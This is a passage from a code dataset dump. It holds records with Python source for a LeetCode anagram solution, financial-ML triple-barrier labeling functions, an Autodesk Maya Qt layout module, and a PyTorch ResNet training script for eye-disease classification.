s_strs.append(\"\".join(sorted(item)))\n #\n # for _ in range(len(set(s_strs))):\n # item = \"\".join(sorted(strs[0]))\n # intermediate = []\n # val_idx = [index for index, val in enumerate(s_strs) if val == item]\n # intermediate[:] = [strs[index] for index in val_idx]\n # strs[:] = [val for idx, val in enumerate(strs) if idx not in val_idx]\n # s_strs[:] = [val for _, val in enumerate(s_strs) if val != item]\n # out.append(intermediate)\n # return out\n\n\ndef main():\n print(Solution().groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions-to-leetcode/interview-medium/arrays & strings/a_group_anagrams.py","file_name":"a_group_anagrams.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534361123","text":"import sys\nimport math\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport missingno as msno\nimport seaborn as sns\nimport scipy.stats as stats\n\nfrom multiprocessing import cpu_count\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom mpengine import mpPandasObj\n\n# Daily Volatility Estimator [3.1]\ndef getDailyVol(close, span0 = 100):\n df0 = close.index.searchsorted(close.index - pd.Timedelta(days=1))\n df0 = df0[df0>0]\n df0 = pd.Series(close.index[df0-1], index = close.index[close.shape[0]-df0.shape[0]:])\n\n try:\n df0 = close.loc[df0.index] / close.loc[df0.values].values - 1\n #df0 = np.log(close.loc[df0.index] / close.loc[df0.values].values)\n except Exception as e:\n print ('error: {e}\\n please confirm duplicate indices')\n\n df0 = df0.ewm(span=span0).std().rename('dailyVol')\t\t\n return df0\n\n# Symmetric CUSUM Filter [2.5.2.1]\ndef getTEvents(gRaw, h):\n tEvents, sPos, sNeg = [], 0, 0\n sEvents, pEvents = [], []\n\n #diff = np.log(gRaw).diff().dropna().abs()\n #diff = np.log(gRaw).diff().dropna()\n diff = gRaw.diff()\n\n #gRaw0 = gRaw[:-1]\n #gRaw1 = gRaw[1:]\n\n #diff = np.divide(gRaw1, gRaw0) - 1\n\n for i in tqdm(diff.index[1:]):\n try:\n pos, neg = float(sPos + diff.loc[i]), float(sNeg + diff.loc[i])\n except Exception as e:\n print(e)\n print(sPos + diff.loc[i], type(sPos + diff.loc[i]))\n print(sNeg + diff.loc[i], type(sNeg + diff.loc[i]))\n break\n \n sPos, sNeg = max(0.,pos), min(0.,neg)\n if sNeg <- h:\n sNeg = 0\n tEvents.append(i)\n sEvents.append(i)\n \n if sPos > h:\n sPos = 0\n tEvents.append(i)\n pEvents.append(i)\n\n return pd.DatetimeIndex(tEvents), pd.DatetimeIndex(sEvents), pd.DatetimeIndex(pEvents)\n\n# Adding Vertical Barrier [3.4]\ndef addVerticalBarrier(tEvents, close, numDays=1):\n t1 = close.index.searchsorted(tEvents + pd.Timedelta(days = numDays))\n t1 = t1[t1 < close.shape[0]]\n t1 = (pd.Series(close.index[t1], index = tEvents[:t1.shape[0]]))\n return t1\n\n# Triple-Barrier Labeling Method [3.2]\ndef applyPtSlOnT1(close,events,ptSl,molecule):\n # apply stop loss/profit taking, if it takes place before t1 (end of event)\n events_=events.loc[molecule]\n out = events_[['t1']].copy(deep=True)\n \n if ptSl[0]>0: \n pt = ptSl[0]*events_['trgt']\n else: \n pt = pd.Series(index=events.index) # NaNs\n \n if ptSl[1]>0: \n sl = -ptSl[1]*events_['trgt']\n else: \n sl = pd.Series(index=events.index) # NaNs\n \n for loc,t1 in events_['t1'].fillna(close.index[-1]).iteritems():\n df0 = close[loc:t1] # path prices\n df0 = (df0/close[loc]-1) * events_.at[loc,'side'] # path returns\n\n out.loc[loc,'sl'] = df0[df0 < sl[loc]].index.min() # 
earliest stop loss\n out.loc[loc,'pt'] = df0[df0 > pt[loc]].index.min() # earliest profit taking\n\n return out\n\n# Gettting Time of First Touch (getEvents) [3.3], [3.6]\ndef getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):\n #1) get target\n trgt = trgt.loc[tEvents]\n trgt = trgt[trgt > minRet] # minRet\n \n #2) get t1 (max holding period)\n if t1 is False:\n \tt1 = pd.Series(pd.NaT, index = tEvents)\n \n #3) form events object, apply stop loss on t1\n if side is None:\n side_, ptSl_ = pd.Series(1.,index = trgt.index), [ptSl[0],ptSl[0]]\n else: \n side_, ptSl_ = side.loc[trgt.index], ptSl[:2]\n \n events = (pd.concat({'t1':t1,'trgt':trgt,'side':side_}, axis = 1).dropna(subset = ['trgt']))\n df0 = mpPandasObj(func = applyPtSlOnT1, pdObj = ('molecule',events.index),\n numThreads = numThreads, close = close, events = events,\n ptSl = ptSl_)\n\n events['t1'] = df0.dropna(how = 'all').min(axis = 1) # pd.min ignores nan\n\n if side is None:\n events = events.drop('side',axis = 1)\n \n return events\n\n# Labeling for side and size [3.5]\ndef getBinsOld(events,close):\n #1) prices aligned with events\n events_ = events.dropna(subset=['t1'])\n px = events_.index.union(events_['t1'].values).drop_duplicates()\n px = close.reindex(px,method='bfill')\n\n #2) create out object\n out = pd.DataFrame(index=events_.index)\n out['ret'] = px.loc[events_['t1'].values].values/px.loc[events_.index]-1\n out['bin'] = np.sign(out['ret'])\n # where out index and t1 (vertical barrier) intersect label 0\n try:\n locs = out.query('index in @t1').index\n out.loc[locs, 'bin'] = 0\n except:\n pass\n return out\n\n# Expanding getBins to Incorporate Meta-Labeling [3.7]\ndef getBins(events, close):\n '''\n Compute event's outcome (including side information, if provided).\n events is a DataFrame where:\n -events.index is event's starttime\n -events['t1'] is event's endtime\n -events['trgt'] is event's target\n -events['side'] (optional) implies the algo's position side\n Case 1: ('side' not in events): bin in (-1,1) <-label by price action\n Case 2: ('side' in events): bin in (0,1) <-label by pnl (meta-labeling)\n '''\n #1) prices aligned with events\n events_ = events.dropna(subset = ['t1'])\n px = events_.index.union(events_['t1'].values).drop_duplicates()\n px = close.reindex(px,method = 'bfill')\n\n #2) create out object\n out = pd.DataFrame(index = events_.index)\n out['ret'] = px.loc[events_['t1'].values].values / px.loc[events_.index] - 1\n\n if 'side' in events_:\n \tout['ret']*=events_['side'] # meta-labeling\n\n out['bin'] = np.sign(out['ret'])\n\n if 'side' in events_:\n \tout.loc[out['ret'] <= 0,'bin'] = 0 # meta-labeling\n\n return out\n\n# Dropping Unnecessary Labels [3.8]\ndef dropLabels(events, minPct=.05):\n # apply weights, drop labels with insufficient examples\n while True:\n df0=events['bin'].value_counts(normalize=True)\n\n if df0.min()>minPct or df0.shape[0]<3:break\n print('dropped label: ', df0.argmin(),df0.min())\n events=events[events['bin']!=df0.argmin()]\n return events\n\ndef df_returns(s):\n arr = np.diff(np.log(s))\n return (pd.Series(arr, index=s.index[1:]))\n\ndef df_rolling_autocorr(df, window, lag=1):\n \"\"\"Compute rolling column-wise autocorrelation for a DataFrame.\"\"\"\n\n return (df.rolling(window=window)\n .corr(df.shift(lag))) # could .dropna() here","sub_path":"lopez/labeling.py","file_name":"labeling.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"42342755","text":"from maya.app.flux.commonImports import *\nimport maya.app.flux.ui.core as fui\nfrom maya.app.flux.ui.core import pix\n\nimport maya.OpenMayaUI as omui\nimport types\n\nclass LayoutInterface(object):\n @staticmethod\n def wrap(obj, layoutType):\n fui.registerQtObject(obj)\n obj.layoutType = layoutType\n obj.childLayouts = []\n obj.parentLayout = None\n obj.parentableLayout = None\n\n toBeImplemented = ['updateHeight']\n\n for f in toBeImplemented:\n if not hasattr(obj, f):\n raise NotImplementedError(\"Function not implemented: \" + f)\n\n LayoutInterface.addMethod(obj, 'resizeUpstream')\n LayoutInterface.addMethod(obj, 'resizeDownstream')\n LayoutInterface.addMethod(obj, 'getFullName')\n if layoutType != 'stackedLayout':\n LayoutInterface.addMethod(obj, 'addWidget')\n LayoutInterface.addMethod(obj, 'addSpacing')\n LayoutInterface.addMethod(obj, 'addStretch')\n LayoutInterface.addMethod(obj, 'setAsMelParent')\n\n @staticmethod\n def addMethod(obj, methodName):\n method = LayoutInterface.__dict__[methodName]\n obj.__dict__[methodName] = types.MethodType(method, obj, LayoutInterface) \n\n def resizeUpstream(self):\n self.updateHeight()\n if self.parentLayout is not None:\n self.parentLayout.resizeUpstream()\n\n def resizeDownstream(self):\n for c in self.childLayouts:\n c.resizeDownstream()\n\n def getFullName(self):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n return omui.MQtUtil.fullName( long(unwrapInstance(self.parentableLayout)[0]) )\n\n def addWidget(self, widget, stretchFactor=0, alignment=0):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addWidget(widget, stretchFactor, alignment)\n self.childLayouts.append(widget)\n if hasattr(widget, 'parentLayout'):\n widget.parentLayout = self\n\n def addSpacing(self, value):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addSpacing(value)\n\n def addStretch(self, factor=1):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addStretch(factor)\n\n def setAsMelParent(self):\n if self.parentableLayout is None:\n return\n cmds.setParent(self.getFullName())\n\n# Top Level Mandatory Layout\nclass Layout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self):\n super(Layout, self).__init__()\n LayoutInterface.wrap(self, 'wrapper')\n\n self.setFixedHeight(pix(10))\n self.contents = Contents(self)\n\n self.parentName = cmds.setParent(q=True)\n self.addWidgetToParent(self.parentName, self)\n\n self.parent().children()[0].setContentsMargins(0,0,0,0)\n\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self, childHeight=None):\n if childHeight is None:\n height = self.contents.sizeHint().height()\n \n if height == 0:\n self.setContentsMargins(0,0,0,0)\n self.contents.setFixedHeight(height)\n self.setFixedHeight(height)\n else:\n self.setContentsMargins(0,pix(1),0,0)\n self.contents.setFixedHeight(height+2)\n self.setFixedHeight(height+2)\n\n def resizeEvent(self, e):\n super(Layout, self).resizeEvent(e)\n if self.rect().width() != self.contents.rect().width():\n self.contents.setFixedWidth(self.rect().width())\n\n def addWidgetToParent(self, parentName, widget):\n currentParent = omui.MQtUtil.findLayout(parentName)\n currentParent = wrapInstance(long(currentParent), 
qt.QWidget)\n layout = currentParent.layout()\n layout.addWidget(widget)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass Contents(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent):\n super(Contents, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n fui.setVLayout(self,pix(2),0,0,0,0)\n\n fui.registerQtObject(self)\n fui.registerQtObject(self.layout())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass Tab(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self):\n super(Tab, self).__init__()\n LayoutInterface.wrap(self, 'tab')\n\n fui.setWidgetWindowColor(self, [68,68,68])\n self.setAutoFillBackground(True)\n\n fui.setVLayout(self,pix(2),pix(5),pix(2),pix(5),pix(2))\n #self.layout().addSpacing()\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n height = self.sizeHint().height()\n self.setFixedHeight(height)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass TabLayout(qt.QTabWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent):\n super(TabLayout, self).__init__()\n LayoutInterface.wrap(self, 'tabLayout')\n\n self.currentChanged.connect(self.currentTabChanged)\n\n self.setStyleSheet('QTabWidget{border:none;}')\n\n self.stackedWidget = qt.QStackedWidget()\n fui.registerQtObject(self.stackedWidget)\n fui.registerQtObject(self.stackedWidget.children()[0])\n\n parent.addWidget(self)\n parent.addWidget(self.stackedWidget)\n\n def addTabNamed(self, widget, name):\n if widget.layoutType != 'tab':\n return\n self.childLayouts.append(widget)\n if hasattr(widget, 'parentLayout'):\n widget.parentLayout = self\n self.addTab(qt.QWidget(), name)\n self.stackedWidget.addWidget(widget)\n \n def updateHeight(self):\n height = self.childLayouts[self.currentIndex()].sizeHint().height()\n self.setFixedHeight(pix(20)) \n self.stackedWidget.setFixedHeight(height) \n\n def currentTabChanged(self, index):\n self.stackedWidget.setCurrentIndex(index)\n self.resizeUpstream()\n\n def hideEvent(self, e):\n qt.QTabWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QTabWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass FrameLayout(fui.FrameWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, text, expanded=False):\n super(FrameLayout, self).__init__(text, expanded)\n LayoutInterface.wrap(self, 'frameLayout')\n\n fui.registerQtObject(self.layout())\n fui.registerQtObject(self.contents)\n fui.registerQtObject(self.contents.layout())\n\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self):\n if self.expanded:\n height = self.contents.sizeHint().height()\n self.setFixedHeight(height+pix(22))\n else:\n self.setFixedHeight(pix(18))\n\n def switchMode(self):\n super(FrameLayout, self).switchMode()\n self.resizeUpstream()\n\n def setEnabled(self, enabled):\n self.contents.setEnabled(enabled)\n\n def hideEvent(self, e):\n fui.FrameWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n 
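# run the default Qt handling first, then notify listeners of the visibility change\n 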
fui.FrameWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass HorizontalLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, offset=0, height=None, parent=None):\n super(HorizontalLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'horizontalLayout')\n fui.setHLayout(self,pix(2),offset,0,0,0)\n\n self.specificHeight = height\n\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n else:\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass VerticalLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, offset=0, height=None, parent=None):\n super(VerticalLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'verticalLayout')\n fui.setVLayout(self,pix(2),0,offset,0,0)\n\n self.specificHeight = height\n\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n else:\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass IndentLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, name='', parent=None, autoStretch=True):\n super(IndentLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'indentLayout')\n fui.setHLayout(self,0,0,0,0,0)\n\n w = fui.widgetWithLayout('H',0,0,0,0,0)\n w.setFixedWidth(pix(148))\n w.layout().addStretch()\n\n self.label = qt.QLabel(name.strip())\n self.label.setMargin(0)\n self.label.setContentsMargins(0,0,pix(2),0)\n w.layout().addWidget(self.label)\n self.layout().addWidget(w, 0)\n\n self.contents = fui.widgetWithLayout('H',0,0,0,0,0)\n self.layout().addSpacing(pix(2))\n\n if autoStretch:\n self.layout().addWidget(self.contents, 0)\n self.layout().addStretch(1)\n else:\n self.layout().addWidget(self.contents, 1)\n\n self.layout().addSpacing(pix(16))\n\n fui.registerQtObject(self.layout())\n fui.registerQtObject(self.contents)\n fui.registerQtObject(self.contents.layout())\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self):\n pass\n\n def setEnabled(self, enabled):\n self.contents.setEnabled(enabled)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass StackedLayout(qt.QStackedWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent=None):\n super(StackedLayout, self).__init__(parent)\n self.addPage = self.addWidget\n LayoutInterface.wrap(self, 'stackedLayout')\n fui.registerQtObject(self.children()[0])\n\n def updateHeight(self):\n height = self.currentWidget().sizeHint().height()\n self.setFixedHeight(height)\n\n def setIndex(self, i):\n self.setCurrentIndex(i)\n self.resizeUpstream()\n\n def hideEvent(self, e):\n qt.QStackedWidget.hideEvent(self, e)\n 
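# emit False so listeners know this stacked layout is no longer visible\n 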
self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QStackedWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass StackedPage(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent=None):\n super(StackedPage, self).__init__(parent)\n LayoutInterface.wrap(self, 'stackedPage')\n fui.setVLayout(self,pix(2),0,0,0,0)\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass ZeroHBoxLayout(qt.QHBoxLayout):\n def __init__(self, parent=None):\n super(ZeroHBoxLayout, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n self.setSpacing(0)\n\nclass ZeroVBoxLayout(qt.QVBoxLayout):\n def __init__(self, parent=None):\n super(ZeroVBoxLayout, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n self.setSpacing(0)\n\nclass IconButton(qt.QPushButton):\n def __init__(self, buttonName, iconName, parent=None):\n super(IconButton, self).__init__(buttonName, parent=parent)\n self.setIcon(fui.getIconFromName(iconName))\n self.setFixedHeight(pix(25))\n\nclass RadioImageGroup(qt.QWidget):\n clicked = qt.Signal(int)\n def __init__(self, icons, currentIndex=0, parent=None):\n super(RadioImageGroup, self).__init__(parent)\n self.setLayout(qt.QHBoxLayout())\n self.layout().setContentsMargins(0,0,0,0)\n self.layout().setSpacing(0)\n self.buttons = []\n for i, icon in enumerate(icons):\n btn = fui.ImageButton(icon)\n btn.setBackgroundColor(qt.QColor(64, 134, 169))\n btn.clicked.connect(lambda i=i: self.radioClicked(i))\n self.buttons.append(btn)\n self.layout().addWidget(btn)\n\n\n self.buttons[currentIndex].setHighlighted(True)\n self.currentIndex = currentIndex\n\n def radioClicked(self, index):\n self.setIndex(index)\n self.clicked.emit(index)\n \n\n def setIndex(self, index):\n self.buttons[self.currentIndex].setHighlighted(False)\n self.currentIndex = index\n self.buttons[self.currentIndex].setHighlighted(True)\n\n\nclass ToolButton(fui.ImageButton):\n def __init__(self, imageName, **kwargs):\n super(ToolButton, self).__init__(imageName, **kwargs)\n\n\n\n\n\n\n\n\n\n# ===========================================================================\n# Copyright 2018 Autodesk, Inc. 
All rights reserved.\n#\n# Use of this software is subject to the terms of the Autodesk license\n# agreement provided at the time of installation or download, or which\n# otherwise accompanies this software in either electronic or hard copy form.\n# ===========================================================================\n","sub_path":"Maya2019/Python/Lib/site-packages/maya/app/flux/ae/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":15103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143417367","text":"# Adapted from https://github.com/pytorch/examples/blob/master/imagenet/main.py\nimport argparse\nimport os\nimport shutil\nimport time\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport resnet\nfrom sklearn.metrics import roc_auc_score\nfrom scipy import special\n\nimport TAO_loader\n\nfrom tensorboardX import SummaryWriter\n\nparser = argparse.ArgumentParser(description='TAO training')\nparser.add_argument('--epochs', default=160, type= int, metavar='N', help='number of total epochs')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\nparser.add_argument('--workers',default=6,type=int, metavar='N')\n# parser.add_argument('--num_classes', default=2, type=int, metavar='N')\nparser.add_argument('-b', '--batch_size',default=64, type=int,metavar='N')\nparser.add_argument('--lr',default=0.01,type = float, metavar='LR')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M', help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W',\n help='weight decay (default: 1e-4)')\nparser.add_argument('--print_freq', default=100, type=int, metavar='N', help='print frequency (default: 100)')\nparser.add_argument('--sum_freq', default=100, type=int, metavar='N', help='summary frequency (default: 100)')\nparser.add_argument('--save_freq', default=5, type=int, metavar='N', help='save checkpoint frequency (default: 5)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('-sp', '--summary_path', default='', type=str, metavar='PATH', help='path to store summary event file')\nparser.add_argument('-cp','--checkpoint_path', default='', type=str, metavar='PATH', help='path to store checkpoint')\nparser.add_argument('-op', '--output_path', default='', type=str, metavar='PATH', help='path to store test output')\nparser.add_argument('--suffix', default ='', type = str, help = 'suffix of summmary and checkpoint dir')\nparser.add_argument('--lr_path', default='', type=str, metavar='PATH', help='path to lr file')\n\nparser.add_argument('--threshold',default=0.5,type = float, metavar='THRESHOLD')\n\nparser.add_argument('--trainval_file', default='/DB/rhome/zdcheng/workspace/hyperthyreosis_eye/classification/all_trainval.json',\n type=str, metavar='PATH', help='path to train json file')\nparser.add_argument('--valfold', default=0,\n type=int, metavar='N', help='fold Indicator')\nparser.add_argument('--data_root',default='/DATA5_DB8/data/zdcheng/hyperthyreosis_eye/class_arraydata', type = str,\n metavar='PATH',help='path to image data root')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', help='evaluate model on validation set')\n\nparser.add_argument('--fake', dest='fake', action='store_true', help='use 
fake data')\n\nbest_acc = 0\nbest_prec = 0\nbest_recall = 0\nbest_F1 = 0\nbest_AUC = 0\n\ndef main():\n global args, best_acc, best_prec, best_recall, best_F1, best_AUC, writer\n args = parser.parse_args()\n\n args.summary_path = os.path.join(args.summary_path, args.suffix)\n if not os.path.exists(args.summary_path):\n os.makedirs(args.summary_path)\n writer = SummaryWriter(args.summary_path)\n\n args.checkpoint_path = os.path.join(args.checkpoint_path, args.suffix)\n if not os.path.exists(args.checkpoint_path):\n os.makedirs(args.checkpoint_path)\n\n args.output_path = os.path.join(args.output_path, args.suffix)\n if not os.path.exists(args.output_path):\n os.makedirs(args.output_path)\n\n model = resnet.resnet50(pretrained=True)\n model.fc = nn.Linear(2048, 1)\n model = torch.nn.DataParallel(model).cuda()\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = torch.optim.SGD(model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch'] + 1\n best_acc = checkpoint['best_acc']\n best_prec = checkpoint['best_prec']\n best_recall = checkpoint['best_recall']\n best_F1 = checkpoint['best_F1']\n best_AUC = checkpoint['best_AUC']\n model.load_state_dict(checkpoint['model_state'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n raise RuntimeError()\n\n train_dataset = TAO_loader.TAO(args.trainval_file, args.data_root, mode='train', val_fold=args.valfold, fake=False )\n val_dataset = TAO_loader.TAO(args.trainval_file, args.data_root, mode='val', val_fold=args.valfold, fake=False )\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers, pin_memory=True)\n global epoch_len\n epoch_len = len(train_loader)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=int(args.batch_size * 0.5), shuffle=False,\n num_workers=args.workers, pin_memory=True)\n Acc, Prec, Recall, F1, AUC = validate(val_loader, model, criterion, -1)\n for epoch in range(args.start_epoch, args.epochs):\n adjust_learning_rate(optimizer, epoch, args.lr_path)\n\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch)\n\n # evaluate on validation set\n Acc,Prec,Recall,F1,AUC = validate(val_loader, model, criterion, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = Acc > best_acc\n best_acc = max(Acc, best_acc)\n best_prec = max(Prec, best_prec)\n best_recall = max(Recall, best_recall)\n best_F1 = max(F1, best_F1)\n best_AUC = max(AUC, best_AUC)\n\n save_checkpoint({\n 'epoch': epoch,\n #'arch': args.arch,\n 'model_state': model.state_dict(),\n 'best_acc': best_acc,\n 'best_prec': best_prec,\n 'best_recall': best_recall,\n 'best_F1': best_F1,\n 'best_AUC': best_AUC,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, epoch)\n\ndef train(trainloader, model, criterion, optimizer, epoch):\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n accMeter = AverageMeter()\n\n model.train()\n\n end = time.time()\n\n for i, (input, target) in enumerate(trainloader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input, target = input.cuda(), 
target.to(torch.float32).cuda()\n\n # compute output\n output = model(input)\n loss = criterion(output.view(output.size(0)), target)\n\n # measure accuracy and record loss\n acc = accuracy(output.detach(), target, args.threshold)\n losses.update(loss.item(), input.size(0))\n accMeter.update(acc, input.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {accMeter.val:.3f} ({accMeter.avg:.3f})'.format(\n epoch, i, len(trainloader), batch_time=batch_time,\n data_time=data_time, loss=losses, accMeter=accMeter))\n\n global_step = epoch * epoch_len + i\n if i % args.sum_freq == 0:\n writer.add_scalar('train_loss', loss.item(), global_step)\n writer.add_scalar('train_acc', acc, global_step)\n global_step = epoch * epoch_len + epoch_len - 1\n writer.add_scalar('epochavg_train_loss', losses.avg, global_step)\n writer.add_scalar('epochavg_train_acc', accMeter.avg, global_step)\n\ndef validate(val_loader, model, criterion, epoch):\n # epoch < 0 means no summary\n batch_time = AverageMeter()\n losses = AverageMeter()\n accMeter = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n input, target = input.cuda(), target.to(torch.float32).cuda()\n\n # compute output\n output = model(input)\n loss = criterion(output.view(output.size(0)), target)\n\n # measure accuracy and record loss\n acc = accuracy(output.detach(), target, args.threshold)\n losses.update(loss.item(), input.size(0))\n accMeter.update(acc, input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Val: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {accMeter.val:.3f} ({accMeter.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n accMeter=accMeter))\n if i == 0:\n out_array = output.detach().cpu().numpy()\n target_array = target.detach().cpu().numpy()\n else:\n out_array = np.concatenate((out_array, output.detach().cpu().numpy()), axis=0)\n target_array = np.concatenate( (target_array, target.detach().cpu().numpy()), axis = 0)\n out_array = out_array.reshape(out_array.shape[0])\n Prec,Recall,F1 = precision_recall_F1(out_array,target_array,threshold=args.threshold)\n AUC = AUROC(out_array, target_array)\n\n print(' * Acc {accMeter.avg:.3f} '.format(accMeter=accMeter))\n print(' * Prec {:.4f}'.format(Prec))\n print(' * Recall {:.4f}'.format(Recall))\n print(' * F1 {:.4f}'.format(F1))\n print(' * AUC {:.4f}'.format(AUC))\n\n\n if epoch >= 0:\n global_step = epoch * epoch_len + epoch_len - 1\n writer.add_scalar('val_loss', losses.avg, global_step)\n writer.add_scalar('val_acc', accMeter.avg, global_step)\n writer.add_scalar('val_prec', Prec, global_step)\n writer.add_scalar('val_recall', Recall, global_step)\n writer.add_scalar('val_F1', F1, global_step)\n writer.add_scalar('val_AUC', AUC, global_step)\n\n print('Saving output:')\n np.save(os.path.join(args.output_path, 'out{:0>3}.npy'.format(epoch)), out_array)\n\n return accMeter.avg,Prec,Recall,F1,AUC\n\n\ndef adjust_learning_rate(optimizer, epoch, file_path):\n f 
